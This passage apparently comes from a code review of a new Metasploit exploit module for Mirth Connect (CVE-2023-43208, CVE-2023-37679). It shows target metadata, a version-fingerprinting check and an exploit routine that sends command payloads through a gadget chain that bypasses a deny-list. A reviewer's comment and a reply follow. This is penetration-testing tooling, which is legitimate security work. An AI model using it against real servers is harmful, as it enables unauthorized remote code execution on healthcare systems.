modules/exploits/multi/http/mirth_connect_cve_2023_43208.rb

```diff
@@ -0,0 +1,243 @@
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux', 'win'],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Payload' => { 'Space' => 8191, 'DisableNops' => true }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    )
+    return CheckCode::Unknown('HTTP fingerprinting failed.') if res.nil?
+
+    unless res.get_html_document&.xpath('//head/title')&.first&.text =~ /Mirth Connect/
+      return CheckCode::Safe('The target is not Mirth Connect.')
+    end
+
+    target_version = get_target_version
+    return CheckCode::Detected('Failed to detect the target version.') unless target_version
+
+    vprint_status("Detected target version: #{target_version}")
+
+    if target_version <= Rex::Version.new('4.3.0')
+      return CheckCode::Appears("Version #{target_version} is affected by CVE-2023-37679.")
+    elsif target_version <= Rex::Version.new('4.4.0')
+      return CheckCode::Appears("Version #{target_version} is affected by CVE-2023-43208.")
+    end
+
+    CheckCode::Safe("Version #{target_version} is not affected.")
+  end
+
+  def get_target_version
+    return @target_version if @target_version
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api/server/version'),
+      'headers' => {
+        'X-Requested-With' => 'OpenAPI'
+      }
+    )
+    return nil unless res&.code == 200
+    return nil unless res.body =~ /(\d+(\.\d+)*)/
+
+    @target_version = Rex::Version.new(Regexp.last_match(1))
+    @target_version
+  end
+
+  def exploit
+    target_version = get_target_version
+    print_status("Executing #{payload_instance.refname} (#{target.name})")
+
+    if target_version <= Rex::Version.new('4.3.0')
+      # The CVE-2023-43208 gadget chain will also work here but use the old one to verify the original vulnerability
+      # which did not implement the deny-list logic that was bypassed by the newer chain
+      execute_command_cve_2023_37679(payload.encoded)
+    elsif target_version <= Rex::Version.new('4.4.0')
+      execute_command_cve_2023_43208(payload.encoded)
```

Comment:
I noticed both of these `execute_command_cve_2023_*` methods end with `res&.code == 500` as if the boolean value is being returned but neither of the methods accept a return value. Do we need to assign `res` in these methods?

Reply:
You're right, the return value from these methods is not used. Let me add something to provide some basic feedback to the user.